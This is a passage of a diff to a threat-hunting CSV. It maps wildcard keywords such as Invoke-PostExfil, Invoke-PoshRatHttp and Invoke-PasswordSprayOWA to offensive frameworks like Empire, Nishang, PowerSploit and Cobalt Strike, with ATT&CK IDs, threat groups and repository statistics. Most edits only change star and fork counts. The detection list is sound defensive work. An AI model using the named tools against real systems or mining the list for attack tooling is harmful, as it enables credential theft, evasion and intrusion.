or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-PasswordSprayEWS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-PasswordSprayGmail*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-PasswordSprayOWA*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-PatchDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PatchDll*","offensive_tool_keyword","empire","Empire 
scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PSInject.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PatchDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Phant0m*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-Phant0m*","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","26","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z" "*Invoke-Phant0m*","offensive_tool_keyword","Invoke-Phant0m","This script walks thread stacks of Event Log Service process (spesific svchost.exe) and identify Event Log Threads to kill Event Log Service Threads. So the system will not be able to collect logs and at the same time the Event Log Service will appear to be running. I have made this script for two reasons. First. This script will help to Red Teams and Penetration Testers. Second. I want to learn Powershell and Low-Level things on Powershell for cyber security field","T1059 - T1086 - T1216","TA0007 - TA0008","N/A","N/A","Defense Evasion","https://github.com/hlldz/Invoke-Phant0m","1","0","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" 
@@ -12119,340 +12274,341 @@
 "*Invoke-Phant0m.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
 "*Invoke-Phant0m.ps1*","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","26","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z"
 "*Invoke-Phant0m.ps1*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z"
-"*invoke-pipekat *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*invoke-pipekat *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Invoke-Piper*","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral movement","https://github.com/p3nt4/Invoke-Piper","1","1","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" "*Invoke-PiperClient*","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral 
movement","https://github.com/p3nt4/Invoke-Piper","1","1","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" "*Invoke-PiperServer*","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral movement","https://github.com/p3nt4/Invoke-Piper","1","1","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" "*Invoke-PipeShell.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-PortBind*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PortBind*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Portscan*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-PortScan*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*Invoke-Portscan*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Portscan.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-PortScan*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-Portscan*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-PortScan*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Invoke-Portscan*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Portscan.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PortScan*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-Portscan*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-Portscan.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-Portscan.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1081","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-PoshRatHttp*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*Invoke-PoshRatHttp*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-PoshRatHttps*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-PostExfil*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PostExfil.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-PostExfil*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
